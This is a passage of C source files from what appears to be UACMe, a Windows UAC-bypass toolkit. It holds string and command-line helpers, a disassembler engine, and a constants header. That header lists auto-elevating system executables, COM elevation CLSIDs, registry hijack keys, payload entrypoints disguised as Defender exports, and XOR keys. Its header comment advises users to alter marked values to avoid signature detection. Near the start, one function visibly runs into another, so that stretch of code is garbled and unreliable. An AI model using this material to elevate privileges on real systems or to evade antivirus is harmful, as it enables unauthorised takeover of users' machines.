"content": "#include \n#include \"minirtl.h\"\n\nchar *_filename_a(const char *f)\n{\n\tchar *p = (char *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '\\\\')\n\t\t\tp = (char *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nwchar_t *_filename_w(const wchar_t *f)\n{\n\twchar_t *p = (wchar_t *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'\\\\')\n\t\t\tp = (wchar_t *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nchar *_fileext_a(const char *f)\n{\n\tchar *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '.')\n\t\t\tp = (char *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (char *)f;\n\n\treturn p;\n}\n\nwchar_t *_fileext_w(const wchar_t *f)\n{\n\twchar_t *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'.')\n\t\t\tp = (wchar_t *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (wchar_t *)f;\n\n\treturn p;\n}\n\nchar *_filename_noext_a(char *dest, const char *f)\n{\n char *p, *l, *dot;\n\n if ((f == 0) || (dest == 0))\n return 0;\n\n p = _filename_a(f);\n if (p == 0)\n return 0;\n\n dot = _strend_a(p);\n if (dot == 0)\n return 0;\n\n l = p;\n\n while (*l != (char)0)\n {\n if (*l == '.')\n dot = l;\n l++;\n }\n\n while (p0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
},
{
"path": "Source/Shared/_strncmpi.c",
"content": "#include \"rtltypes.h\"\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
},
{
"path": "Source/Shared/_strncpy.c",
"content": "#include \"rtltypes.h\"\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)\n{\n\twchar_t *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n"
},
{
"path": "Source/Shared/_strstri.c",
"content": "#include \"rtltypes.h\"\n\nchar *_strstri_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_a(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_a(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_a(*tmps);\n\t\t\tc2 = locase_a(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_w(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_w(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_w(*tmps);\n\t\t\tc2 = locase_w(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
},
{
"path": "Source/Shared/cmdline.c",
"content": "#include \n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tWCHAR\tdivider;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tif (CmdLine == NULL) {\n\t\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t\t*Buffer = 0;\n\t\treturn FALSE;\n\t}\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tCHAR\tdivider;\n\n\tif (CmdLine == NULL)\n\t\treturn FALSE;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath)\n{\n\tchar *p = (char *)FileName, *p0 = (char *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (char *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)\n{\n\twchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (wchar_t *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n"
},
{
"path": "Source/Shared/cmdline.h",
"content": "#ifndef _CMDLINEH_\n#define _CMDLINEH_\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath);\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);\n\n#ifdef UNICODE\n\n#define ExtractFilePath\t\t\tExtractFilePathW\n#define GetCommandLineParam\t\tGetCommandLineParamW\n\n#else // ANSI\n\n#define ExtractFilePath\t\t\tExtractFilePathA\n#define GetCommandLineParam\t\tGetCommandLineParamA\n\n#endif\n\n#endif /* _CMDLINEH_ */\n"
},
{
"path": "Source/Shared/consts.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n* TITLE: CONSTS.H\n*\n* VERSION: 3.69\n*\n* DATE: 14 Dec 2025\n*\n* Global consts definition file.\n*\n* If you are looking for unique enough pattern look for values/regions marked as \"PYSH\".\n* Get rid of these values, or customize them otherwise.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define AKAGI_XOR_KEY 'naka'\n#define AKAGI_XOR_KEY2 ' pta'\n\n//\"UACMe\"\n#define ISDB_PROGRAMNAME 6\n\n#define UCM_VERSION_MAJOR 3\n#define UCM_VERSION_MINOR 6\n#define UCM_VERSION_REVISION 9\n#define UCM_VERSION_BUILD 2512\n\n#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000\n\n//\n// A very long list for future use.\n//\n#define UACME_SHARED_BASE_ID 'sTlA'\n\n//\n// Trash end char.\n//\n#define UCM_TRASH_END_CHAR L'~'\n\n//\n// WORD sized id list.\n//\n#define AKAGI_COMPLETION_EVENT_ID 'ab'\n#define AKAGI_SHARED_SECTION_ID 'cd'\n#define AKAGI_BDESCRIPTOR_NAME_ID 'ef'\n#define FUBUKI_SYNC_MUTEX_ID 'a1'\n#define FUBUKI_PCA_SECTION_ID '0f'\n#define FUBUKI_PCA_EVENT_ID '1f'\n\n#define FUBUKI_PCA_PAYLOAD_RUN (0x1)\n#define FUBUKI_PCA_LOADER_RUN (0x2)\n#define FUBUKI_PCA_ALL_RUN (FUBUKI_PCA_PAYLOAD_RUN | FUBUKI_PCA_LOADER_RUN)\n\n//\n// Kamikaze consts\n//\n#define KAMIKAZE_MARKER \"https\"\n#define WF_MSC L\"wf.msc\"\n\n#define T_DEFAULT_DESKTOP L\"WinSta0\\\\Default\"\n\n#define T_WINDOWS_CURRENT_VERSION L\"MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\"\n\n#pragma region PYSH\n\n#define T_DISPLAY_CALIBRATION L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\ICM\\\\Calibration\"\n#define T_PCA_STORE L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\"\n#define T_APPCOMPAT_LAYERS L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Layers\"\n#define T_PCA_PERSISTED L\"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Persisted\"\n#define T_APP_ASSOC_TOASTS L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\ApplicationAssociationToasts\"\n#define T_HTMLHELP_AUTHOR L\"Software\\\\Microsoft\\\\HtmlHelp Author\"\n#define T_WEBVIEW_POLICY L\"Software\\\\Policies\\\\Microsoft\\\\Edge\\\\WebView2\\\\BrowserExecutableFolder\"\n\n#define T_CURVER L\"CurVer\"\n#define T_MSSETTINGS L\"ms-settings\"\n#define T_MSWINDOWSSTORE L\"ms-windows-store\"\n#define T_QUICKASSIST L\"ms-quick-assist:\"\n#define T_CLASSESFOLDER L\"Folder\"\n#define T_LAUNCHERSYSTEMSETTINGS L\"Launcher.SystemSettings\"\n#define T_LOCATION L\"Location\"\n\n#define ELLOCNAK_MSU L\"update.msu\"\n#define RUN_CMD_COMMAND L\" /c start \"\n\n#define T_APPXSVC L\"AppXSvc\"\n#define T_PCASVC L\"PcaSvc\"\n\n#pragma endregion\n\n#define T_SOFTWARE_CLASSES L\"Software\\\\Classes\"\n\n#define T_SHELL_OPEN L\"\\\\shell\\\\open\"\n#define T_SHELL_COMMAND L\"command\"\n#define T_URL_PROTOCOL L\"URL Protocol\"\n\n#define T_URL_MS_WIN_STORE L\"URL:ms-windows-store\"\n\n#define T_SDDL_ALL_FOR_EVERYONE L\"D:(A;;GA;;;WD)\"\n#define T_SDDL_EVERYONE_FULL_ACCESS L\"D:PAI(A;OICI;FA;;;WD)\"\n#define T_WINDIR L\"windir\"\n#define T_SYSTEMROOT L\"systemroot\"\n#define T_WINDOWSMEDIAPLAYER L\"Windows Media Player\"\n\n#define T_DELEGATEEXECUTE L\"DelegateExecute\"\n\n#define T_PROTO_HTTP L\"http\"\n\n//\n// Unit names and entrypoints\n//\n#pragma region PYSH\n#define KAMIKAZE_MSC L\"kmkze.msc\"\n#define KAMIKAZE_LAUNCHER L\"readme.html\"\n\n#define FUBUKI_EXT_ENTRYPOINT \"MpManagerOpen\"\n#define FUBUKI_WND_HOOKPROC \"MpHandleClose\"\n#define FUBUKI_DEFAULT_ENTRYPOINT \"MpScanStart\"\n#define FUBUKI_ENTRYPOINT_UIACCESS2 \"MpScanControl\"\n#define FUBUKI_ENTRYPOINT_UIACCESS3 \"MpUpdateEngine\"\n#define FUBUKI_ENTRYPOINT_SXS \"MpThreatOpen\"\n#define FUBUKI_ENTRYPOINT_PCAEXE \"MpManagerStatusQuery\"\n#define FUBUKI_ENTRYPOINT_PCADLL \"MpManagerStatusQueryEx\"\n#define FUBUKI_ENTRYPOINT_QASSIST \"MpThreatEnumerate\"\n#define AKATSUKI_ENTRYPOINT_EXE \"Wow64LogMessageArgList\" \n#pragma endregion\n\n//\n// Windows dll names\n//\n#define APISET_KERNEL32LEGACY L\"api-ms-win-core-kernel32-legacy-l1.DLL\"\n\n#define ATL_DLL L\"ATL.dll\"\n#define BLUETOOTHDIAGNOSTICUTIL_DLL L\"BluetoothDiagnosticUtil.dll\"\n#define COMCTL32_DLL L\"comctl32.dll\"\n#define DISMCORE_DLL L\"dismcore.dll\"\n#define DUSER_DLL L\"duser.dll\"\n#define EMBEDDEDBROWSERWEBVIEW_DLL L\"EmbeddedBrowserWebView.dll\"\n#define GDIPLUS_DLL L\"GdiPlus.dll\"\n#define ISCSIEXE_DLL L\"iscsiexe.dll\"\n#define OSKSUPPORT_DLL L\"OskSupport.dll\"\n#define PCADM_DLL L\"pcadm.dll\"\n#define PERFORMANCETRACEHANDLER_DLL L\"PerformanceTraceHandler.dll\"\n#define SHELL32_DLL L\"shell32.dll\"\n#define WINMM_DLL L\"winmm.dll\"\n#define WOW64LOG_DLL L\"wow64log.dll\"\n\n//\n// Native image cache targets\n//\n#define ASSEMBLY_MMCEX L\"MMCEx\"\n#define MMCEX_NI_DLL L\"MMCEx.ni.dll\"\n#define MMCEX_NI_DLL_AUX L\"MMCEx.ni.dll.aux\"\n\n#define ASSEMBLY_ACCESSIBILITY L\"Accessibility\"\n\n//\n// Windows executables\n//\n#define CMD_EXE L\"cmd.exe\"\n#define CLIPUP_EXE L\"Clipup.exe\"\n#define COMPUTERDEFAULTS_EXE L\"computerdefaults.exe\"\n#define CONSENT_EXE L\"consent.exe\"\n#define DCCW_EXE L\"dccw.exe\"\n#define EVENTVWR_EXE L\"eventvwr.exe\"\n#define EXPLORER_EXE L\"explorer.exe\"\n#define FODHELPER_EXE L\"fodhelper.exe\"\n#define ISCSICPL_EXE L\"iscsicpl.exe\"\n#define MMC_EXE L\"mmc.exe\"\n#define MSCONFIG_EXE L\"msconfig.exe\"\n#define MSCHEDEXE_EXE L\"mschedexe.exe\"\n#define MSDT_EXE L\"msdt.exe\"\n#define OSK_EXE L\"osk.exe\"\n#define PKGMGR_EXE L\"pkgmgr.exe\"\n#define QUICKASSIST_EXE L\"QuickAssist.exe\"\n#define SDCLT_EXE L\"sdclt.exe\"\n#define SLUI_EXE L\"slui.exe\"\n#define TASKHOSTW_EXE L\"taskhostw.exe\"\n#define WINSAT_EXE L\"winsat.exe\"\n#define WINVER_EXE L\"winver.exe\"\n#define WSRESET_EXE L\"WSReset.exe\"\n#define WUSA_EXE L\"wusa.exe\"\n\n//\n// Windows subdirectories\n//\n\n// system32 only name\n#define SYSTEM32_DIR_NAME L\"system32\"\n\n// system32 with both sides slash\n#define SYSTEM32_DIR L\"\\\\system32\\\\\"\n\n// syswow64 with both sides slash\n#define SYSWOW64_DIR L\"\\\\syswow64\\\\\"\n\n#define NET2_DIR L\"v2.0.50727\"\n#define NET4_DIR L\"v4.0.30319\"\n#define MSNETFRAMEWORK_DIR L\"Microsoft.NET\\\\Framework\"\n#define MMCEX_DIR L\"\\\\MMCEx\"\n#define WBEM_DIR L\"wbem\\\\\"\n#define WEBVIEW_DIR L\"EBWebView\"\n\n//\n// Shell Verbs\n//\n#define RUNAS_VERB L\"runas\"\n\n//\n// Windows MMC snap-ins\n//\n#define EVENTVWR_MSC L\"eventvwr.msc\"\n#define WMIMGMT_MSC L\"WmiMgmt.msc\"\n\n//\n// Units specific values\n//\n#define MYSTERIOUSCUTETHING L\"pe386\" //PYSH\n#define ABSOLUTEWIN L\"lzx32\" //PYSH\n#define THEOLDNEWTHING L\"hui32\" //PYSH\n\n//\n// SxS\n//\n#define LOCAL_SXS L\".local\" //PYSH\n#define FAKE_LOCAL_SXS L\".@\" //PYSH\n#define COMCTL32_SXS L\"microsoft.windows.common-controls\"\n#define GDIPLUS_SXS L\"microsoft.windows.gdiplus\"\n\n//\n// System consts\n//\n#define T_VOLATILE_ENV L\"Volatile Environment\"\n#define T_REGISTRY_PREP L\"\\\\REGISTRY\\\\\" //end slash included\n\n//\n// COR profiler\n//\n#define COR_PROFILER L\"COR_PROFILER\"\n#define COR_PROFILER_PATH L\"COR_PROFILER_PATH\"\n#define COR_ENABLE_PROFILING L\"COR_ENABLE_PROFILING\"\n\n//\n// WebView environment variable\n//\n#define WEBVIEW2_FOLRDER_VAR L\"WEBVIEW2_BROWSER_EXECUTABLE_FOLDER\"\n\n//\n// DCCW calibrator\n//\n#define T_CALIBRATOR_VALUE L\"DisplayCalibrator\" //PYSH\n\n//\n// COM related trash\n//\n#define T_REG_SOFTWARECLASSESCLSID L\"Software\\\\Classes\\\\CLSID\\\\\"\n#define T_REG_INPROCSERVER32 L\"\\\\InProcServer32\"\n#define T_REG_SHELLFOLDER L\"\\\\ShellFolder\"\n\n#define T_THREADINGMODEL L\"ThreadingModel\"\n#define T_APARTMENT L\"Apartment\"\n\n//\n// COM objects elevation\n//\n#pragma region PYSH\n#define T_CLSID_ColorDataProxy L\"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}\"\n#define T_CLSID_CMSTPLUA L\"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\"\n#define T_CLSID_FwCplLua L\"{752438CB-E941-433F-BCB4-8B7D2329F0C8}\"\n#define T_CLSID_FileOperation L\"{3AD05575-8857-4850-9277-11B85BDB8E09}\"\n#define T_CLSID_ShellSecurityEditor L\"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\"\n#define T_CLSID_EditionUpgradeManager L\"{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}\"\n#define T_CLSID_IEAAddonInstaller L\"{BDB57FF2-79B9-4205-9447-F5FE85F37312}\"\n#define T_CLSID_SecurityCenter L\"{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}\"\n#define T_CLSID_VFServer L\"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\"\n#define T_CLSID_VFServerDiagCpl L\"{12C21EA7-2EB8-4B55-9249-AC243DA8C666}\"\n#define T_CLSID_DiagnosticProfile L\"{D0B7E02C-E1A3-11DC-81FF-001185AE5E76}\"\n#pragma endregion\n\n//\n// Moniker(s)\n//\n#define T_ELEVATION_MONIKER_ADMIN L\"Elevation:Administrator!new:\"\n\n\n//\n// RPC interface UUID\n//\n#define APPINFO_RPC TEXT(\"201ef99a-7fa0-444c-9399-19ba84f12a1a\")\n#define PCASVC_RPC TEXT(\"0767a036-0d22-48aa-ba69-b619480f38cb\")\n"
},
{
"path": "Source/Shared/hde/hde64.c",
"content": "/*\n * Hacker Disassembler Engine 64 C\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n */\n\n#include \"hde64.h\"\n#include \"table64.h\"\n\n#pragma warning(push)\n#pragma warning(disable:4701)\n#pragma warning(disable:4706)\n\nunsigned int hde64_disasm(const void *code, hde64s *hs)\n{\n uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0;\n uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0;\n uint8_t op64 = 0;\n\n // Avoid using memset to reduce the footprint.\n#ifndef _MSC_VER\n memset((LPBYTE)hs, 0, sizeof(hde64s));\n#else\n __stosb((LPBYTE)hs, 0, sizeof(hde64s));\n#endif\n\n for (x = 16; x; x--)\n switch (c = *p++) {\n case 0xf3:\n hs->p_rep = c;\n pref |= PRE_F3;\n break;\n case 0xf2:\n hs->p_rep = c;\n pref |= PRE_F2;\n break;\n case 0xf0:\n hs->p_lock = c;\n pref |= PRE_LOCK;\n break;\n case 0x26: case 0x2e: case 0x36:\n case 0x3e: case 0x64: case 0x65:\n hs->p_seg = c;\n pref |= PRE_SEG;\n break;\n case 0x66:\n hs->p_66 = c;\n pref |= PRE_66;\n break;\n case 0x67:\n hs->p_67 = c;\n pref |= PRE_67;\n break;\n default:\n goto pref_done;\n }\n pref_done:\n\n hs->flags = (uint32_t)pref << 23;\n\n if (!pref)\n pref |= PRE_NONE;\n\n if ((c & 0xf0) == 0x40) {\n hs->flags |= F_PREFIX_REX;\n if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8)\n op64++;\n hs->rex_r = (c & 7) >> 2;\n hs->rex_x = (c & 3) >> 1;\n hs->rex_b = c & 1;\n if (((c = *p++) & 0xf0) == 0x40) {\n opcode = c;\n goto error_opcode;\n }\n }\n\n if ((hs->opcode = c) == 0x0f) {\n hs->opcode2 = c = *p++;\n ht += DELTA_OPCODES;\n } else if (c >= 0xa0 && c <= 0xa3) {\n op64++;\n if (pref & PRE_67)\n pref |= PRE_66;\n else\n pref &= ~PRE_66;\n }\n\n opcode = c;\n cflags = ht[ht[opcode / 4] + (opcode % 4)];\n\n if (cflags == C_ERROR) {\n error_opcode:\n hs->flags |= F_ERROR | F_ERROR_OPCODE;\n cflags = 0;\n if ((opcode & -3) == 0x24)\n cflags++;\n }\n\n x = 0;\n if (cflags & C_GROUP) {\n uint16_t t;\n t = *(uint16_t *)(ht + (cflags & 0x7f));\n cflags = (uint8_t)t;\n x = (uint8_t)(t >> 8);\n }\n\n if (hs->opcode2) {\n ht = hde64_table + DELTA_PREFIXES;\n if (ht[ht[opcode / 4] + (opcode % 4)] & pref)\n hs->flags |= F_ERROR | F_ERROR_OPCODE;\n }\n\n if (cflags & C_MODRM) {\n hs->flags |= F_MODRM;\n hs->modrm = c = *p++;\n hs->modrm_mod = m_mod = c >> 6;\n hs->modrm_rm = m_rm = c & 7;\n hs->modrm_reg = m_reg = (c & 0x3f) >> 3;\n\n if (x && ((x << m_reg) & 0x80))\n hs->flags |= F_ERROR | F_ERROR_OPCODE;\n\n if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {\n uint8_t t = opcode - 0xd9;\n if (m_mod == 3) {\n ht = hde64_table + DELTA_FPU_MODRM + t*8;\n t = ht[m_reg] << m_rm;\n } else {\n ht = hde64_table + DELTA_FPU_REG;\n t = ht[t] << m_reg;\n }\n if (t & 0x80)\n hs->flags |= F_ERROR | F_ERROR_OPCODE;\n }\n\n if (pref & PRE_LOCK) {\n if (m_mod == 3) {\n hs->flags |= F_ERROR | F_ERROR_LOCK;\n } else {\n uint8_t *table_end, op = opcode;\n if (hs->opcode2) {\n ht = hde64_table + DELTA_OP2_LOCK_OK;\n table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; //-V594\n } else {\n ht = hde64_table + DELTA_OP_LOCK_OK;\n table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; //-V594\n op &= -2;\n }\n for (; ht != table_end; ht++)\n if (*ht++ == op) {\n if (!((*ht << m_reg) & 0x80))\n goto no_lock_error;\n else\n break;\n }\n hs->flags |= F_ERROR | F_ERROR_LOCK;\n no_lock_error:\n ;\n }\n }\n\n if (hs->opcode2) {\n switch (opcode) {\n case 0x20: case 0x22:\n m_mod = 3;\n if (m_reg > 4 || m_reg == 1)\n goto error_operand;\n else\n goto no_error_operand;\n case 0x21: case 0x23:\n m_mod = 3;\n if (m_reg == 4 || m_reg == 5)\n goto error_operand;\n else\n goto no_error_operand;\n }\n } else {\n switch (opcode) {\n case 0x8c:\n if (m_reg > 5)\n goto error_operand;\n else\n goto no_error_operand;\n case 0x8e:\n if (m_reg == 1 || m_reg > 5)\n goto error_operand;\n else\n goto no_error_operand;\n }\n }\n\n if (m_mod == 3) {\n uint8_t *table_end;\n if (hs->opcode2) {\n ht = hde64_table + DELTA_OP2_ONLY_MEM;\n table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; //-V594\n } else {\n ht = hde64_table + DELTA_OP_ONLY_MEM;\n table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; //-V594\n }\n for (; ht != table_end; ht += 2)\n if (*ht++ == opcode) {\n if (*ht++ & pref && !((*ht << m_reg) & 0x80))\n goto 